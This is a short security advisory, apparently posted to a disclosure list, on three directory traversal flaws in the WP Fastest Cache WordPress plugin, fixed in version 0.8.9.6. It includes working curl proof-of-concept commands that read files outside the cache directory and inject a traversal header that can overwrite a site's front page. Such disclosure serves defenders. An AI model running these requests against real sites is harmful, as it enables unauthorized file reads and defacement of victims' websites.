Share
WP Fastest Cache is a Wordpress plugin that creates static html files  
from the dynamic WordPress blog in order to speed up operation.  
  
Version 0.8.9.5 and below of the plugin was identified being  
vulnerable to directory traversal attacks.  
  
The first two are Windows only, the 3rd one is generic. The Windows  
specific ones were tested on WampServer (so with Apache's Httpd).  
  
#1:  
The impact is reading files outside of the cache directory. The  
attacker has control over the directory only, the file is selected as  
the first hit of the scandir results in descending order.  
  
  
curl --path-as-is http://vulnerable-host.tld/wpfc-minified/..\..\..\/stuff.php  
  
<?php  
/**  
* XML-RPC protocol support for WordPress  
*  
* @package WordPress  
*/  
...  
  
#2:  
The cacheFilePath construction logic in cache.php can be abused to  
mount a similar attack as vuln #1 and read index.html files outside  
the cache directory:  
  
curl --path-as-is http://vulnerable-host.tld/..\..\..\/whatever.html\/..  
some html content outside the cache directory  
<!-- via php -->  
  
  
#3:  
If the Google Translate plugin is active on the victim system then it  
is also possible to create index.html files outside the cache  
directory:  
  
curl -v --header "X-GT-LANG: ../../../.."  
http://vulnerable-host.tld/some-article/  
  
In configurations where the html extension has higher precedence over  
php in the webserver's DirectoryIndex configuration, this could  
actually change the front page of the victim website.  
  
  
Remediation: update to plugin version 0.8.9.6  
  
Imre